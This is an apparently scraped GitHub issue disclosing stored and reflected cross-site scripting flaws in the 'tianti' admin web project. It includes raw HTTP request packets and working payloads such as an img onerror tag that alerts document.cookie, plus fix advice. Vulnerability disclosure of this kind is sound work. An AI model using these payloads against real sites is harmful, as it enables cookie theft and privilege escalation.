tianti icon indicating copy to clipboard operation
tianti copied to clipboard

Published 20 hours ago verified publisher icon xujeff

There are some XSS flaws in your project

Open zsdlove opened this issue 6 years ago • 1 comments 

   Hello,guy,i'm sorry to tell you that your project has so many XSS flaws.

first of all,the userlist module exists a storage type XSS,which will cause cookie Disclosure and Escalation of Privileges. the following picture is the proof of this flaws: image

_20181107210515

packet `POST /tianti-module-admin/user/ajax/save_role HTTP/1.1 Host: 127.0.0.1:8080 Content-Length: 329 Accept: / Origin: http://127.0.0.1:8080 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://127.0.0.1:8080/tianti-module-admin/user/role_list Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=495723A0467ADD3C57A1956E39426E2C; csrftoken=4YqHpDZtkQJbqwTt9bcAqP6UJjUtUdCEjVY42Q2p337RkWfOoFjxK3rnH2gM75Eb Connection: close

id=2c9025ab5a6f2b85015a6f2cef950000&name=%E6%9D%83%E9%99%90%E7%AE%A1%E7%90%86%E5%91%98%22%3E%3Cimg+src%3Di+onerror%3Dalert(document.cookie)&description=%E5%8F%AF%E4%BB%A5%E5%88%86%E9%85%8D%E5%90%8E%E5%8F%B0%E7%94%A8%E6%88%B7&rescoureIds=70&rescoureIds=71&rescoureIds=72&rescoureIds=73&rescoureIds=2c9025ab5adb1eef015adb2e74b90000`

payload: "><img src=i onerror=alert(1)> The following is the descripment of this flaws according to the leak of the code. image

  The path of this pice of code is :tianti-module-admin\src\main\webapp\WEB-INF\views\user\user_list.jsp.
  user_list.jsp received the value from "controller" and displace it without any defensive measures.
  Here is the "usercontroller",and we can get the request parameters from users

image It put the userinfo to the User object.This object will be return to the "view",by ajax method. And we can see,it doesn't exits any defensive measures. image

  Secondly, in the article management mudle,there also exists a storage type xss.
  The following picture is the proof of this flaws:

image

   And the following the is  entry of the flaws

image

   Thirdly,in the usermanagement mudle,there exists a reflect xss.

this functional mudle is created to check the userinfo through the keyword of the user entered. image

packet `POST /tianti-module-admin/user/list HTTP/1.1 Host: 127.0.0.1:8080 Content-Length: 68 Cache-Control: max-age=0 Origin: http://127.0.0.1:8080 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8 Referer: http://127.0.0.1:8080/tianti-module-admin/user/list Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=495723A0467ADD3C57A1956E39426E2C; csrftoken=4YqHpDZtkQJbqwTt9bcAqP6UJjUtUdCEjVY42Q2p337RkWfOoFjxK3rnH2gM75Eb Connection: close

userName=%22%3E%3Cimg+src%3Di+onerror%3Dalert%281%29%3E&currentPage=`

payload "><img src=i onerror=alert(document.cookie)> Advice: You can created a global interceptor to intercept the user requests,and check it if it has Potential threats,and you should also created another gloabal interceptor to intercept the response and,replcae the specail charcater to entity type. Hope you guy fix the flaws quickly,if you have some questions,please contact me with the following e-mail address: [email protected]

zsdlove avatar Nov 07 '18 13:11 zsdlove

Any updates on this issue ?

Ofirnir123 avatar Jul 02 '19 08:07 Ofirnir123